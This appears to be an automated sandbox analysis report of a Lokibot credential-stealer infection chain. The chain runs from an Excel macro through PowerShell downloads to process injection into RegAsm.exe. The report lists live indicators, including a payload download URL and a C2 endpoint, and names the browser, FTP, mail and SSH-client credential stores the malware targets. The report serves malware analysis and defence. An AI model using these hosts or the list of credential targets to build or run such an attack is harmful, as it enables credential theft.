                Source: C:\Users\user\ntrwe.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeQueries volume information: C:\Users\user\AppData\Local\Temp\12.exe VolumeInformationJump to behavior
                Source: C:\Users\user\ntrwe.exeQueries volume information: C:\Users\user\ntrwe.exe VolumeInformationJump to behavior
                Source: C:\Users\user\ntrwe.exeQueries volume information: C:\Users\user\ntrwe.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
                Source: C:\Users\user\ntrwe.exeQueries volume information: C:\Users\user\ntrwe.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00406069 GetUserNameW,17_2_00406069
                Source: C:\Users\user\AppData\Local\Temp\12.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 12.exe PID: 2800, type: MEMORY
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: PopPassword17_2_0040D069
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: SmtpPassword17_2_0040D069
                Source: Yara matchFile source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2192, type: MEMORY
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1Scripting31Valid Accounts1Valid Accounts1Disable or Modify Tools11OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsExploitation for Client Execution13Registry Run Keys / Startup Folder1Access Token Manipulation11Deobfuscate/Decode Files or Information111Credentials in Registry2File and Directory Discovery3Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsCommand and Scripting Interpreter11Logon Script (Windows)Process Injection311Scripting31Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsPowerShell2Logon Script (Mac)Registry Run Keys / Startup Folder1Obfuscated Files or Information3NTDSQuery Registry1Distributed Component Object ModelEmail Collection1Scheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsSecurity Software Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonValid Accounts1Cached Domain CredentialsVirtualization/Sandbox Evasion2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsModify Registry1DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion2Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation11/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection311Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Files and Directories1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 336301 Sample: 6Cprm97UTl Startdate: 05/01/2021 Architecture: WINDOWS Score: 100 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->67 69 9 other signatures 2->69 10 EXCEL.EXE 83 29 2->10         started        13 ntrwe.exe 2->13         started        16 ntrwe.exe 2 2->16         started        process3 file4 85 Obfuscated command line found 10->85 87 Document exploit detected (process start blacklist hit) 10->87 18 cmd.exe 10->18         started        21 cmd.exe 10->21         started        23 cmd.exe 10->23         started        55 C:\Users\user\AppData\Local\Temp\RegAsm.exe, PE32 13->55 dropped 89 Writes to foreign memory regions 13->89 91 Allocates memory in foreign processes 13->91 93 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->93 95 Injects a PE file into a foreign processes 13->95 signatures5 process6 signatures7 71 Obfuscated command line found 18->71 25 powershell.exe 7 18->25         started        27 powershell.exe 16 9 21->27         started        32 RegAsm.exe 21->32         started        34 powershell.exe 7 23->34         started        process8 dnsIp9 36 12.exe 5 25->36         started        57 bighoreca.nl 83.172.144.37, 49167, 80 NEDZONE-ASNL Netherlands 27->57 59 cutt.ly 104.22.0.232, 443, 49165 CLOUDFLARENETUS United States 27->59 53 C:\Users\user\Documents\12.exe, PE32 27->53 dropped 97 Drops PE files to the document folder of the user 27->97 99 Powershell drops PE file 27->99 file10 signatures11 process12 file13 51 C:\Users\user\ntrwe.exe, PE32 36->51 dropped 73 Drops PE files to the user root directory 36->73 75 Hides that the sample has been downloaded from the Internet (zone.identifier) 36->75 40 ntrwe.exe 2 36->40         started        43 cmd.exe 36->43         started        signatures14 process15 signatures16 77 Machine Learning detection for dropped file 40->77 79 Writes to foreign memory regions 40->79 81 Allocates memory in foreign processes 40->81 83 2 other signatures 40->83 45 RegAsm.exe 54 40->45         started        49 reg.exe 1 43->49         started        process17 dnsIp18 61 185.206.215.56, 49168, 49169, 49170 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Ukraine 45->61 101 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 45->101 103 Tries to steal Mail credentials (via file registry) 45->103 105 Tries to steal Mail credentials (via file access) 45->105 107 2 other signatures 45->107 signatures19

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\Documents\12.exe100%Joe Sandbox ML
                C:\Users\user\ntrwe.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\RegAsm.exe0%MetadefenderBrowse
                C:\Users\user\AppData\Local\Temp\RegAsm.exe0%ReversingLabs

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                17.2.RegAsm.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                19.2.RegAsm.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                http://www.a-cert.at0E0%URL Reputationsafe
                http://www.a-cert.at0E0%URL Reputationsafe
                http://www.a-cert.at0E0%URL Reputationsafe
                http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                http://www.e-me.lv/repository00%URL Reputationsafe
                http://www.e-me.lv/repository00%URL Reputationsafe
                http://www.e-me.lv/repository00%URL Reputationsafe
                http://www.acabogacia.org/doc00%URL Reputationsafe
                http://www.acabogacia.org/doc00%URL Reputationsafe
                http://www.acabogacia.org/doc00%URL Reputationsafe
                http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                http://www.certifikat.dk/repository00%Avira URL Cloudsafe
                http://www.chambersign.org10%URL Reputationsafe
                http://www.chambersign.org10%URL Reputationsafe
                http://www.chambersign.org10%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                http://www.sk.ee/cps/00%URL Reputationsafe
                http://www.sk.ee/cps/00%URL Reputationsafe
                http://www.sk.ee/cps/00%URL Reputationsafe
                http://www.globaltrust.info0=0%Avira URL Cloudsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                http://servername/isapibackend.dll0%Avira URL Cloudsafe
                http://www.ssc.lt/cps030%URL Reputationsafe
                http://www.ssc.lt/cps030%URL Reputationsafe
                http://www.ssc.lt/cps030%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                http://ocsp.pki.gva.es00%URL Reputationsafe
                http://ocsp.pki.gva.es00%URL Reputationsafe
                http://ocsp.pki.gva.es00%URL Reputationsafe
                http://crl.oces.certifikat.dk/oces.crl00%Avira URL Cloudsafe
                http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                http://www.dnie.es/dpc00%URL Reputationsafe
                http://www.dnie.es/dpc00%URL Reputationsafe
                http://www.dnie.es/dpc00%URL Reputationsafe
                http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe
                http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe
                http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe
                http://bighoreca.nl/wp-content/themes/index/QPR-3067.exe0%Avira URL Cloudsafe
                http://www.trustcenter.de/guidelines00%URL Reputationsafe
                http://www.trustcenter.de/guidelines00%URL Reputationsafe
                http://www.trustcenter.de/guidelines00%URL Reputationsafe
                http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl00%Avira URL Cloudsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                cutt.ly
                104.22.0.232
                truetrue
                  unknown
                  bighoreca.nl
                  83.172.144.37
                  truetrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://bighoreca.nl/wp-content/themes/index/QPR-3067.exetrue
                    • Avira URL Cloud: safe
                    unknown
                    http://185.206.215.56/morx/1/cgi.phptrue
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.a-cert.at0Epowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.certplus.com/CRL/class3.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.e-me.lv/repository0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.acabogacia.org/doc0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://crl.chambersign.org/chambersroot.crl0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpfalse
                      high
                      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
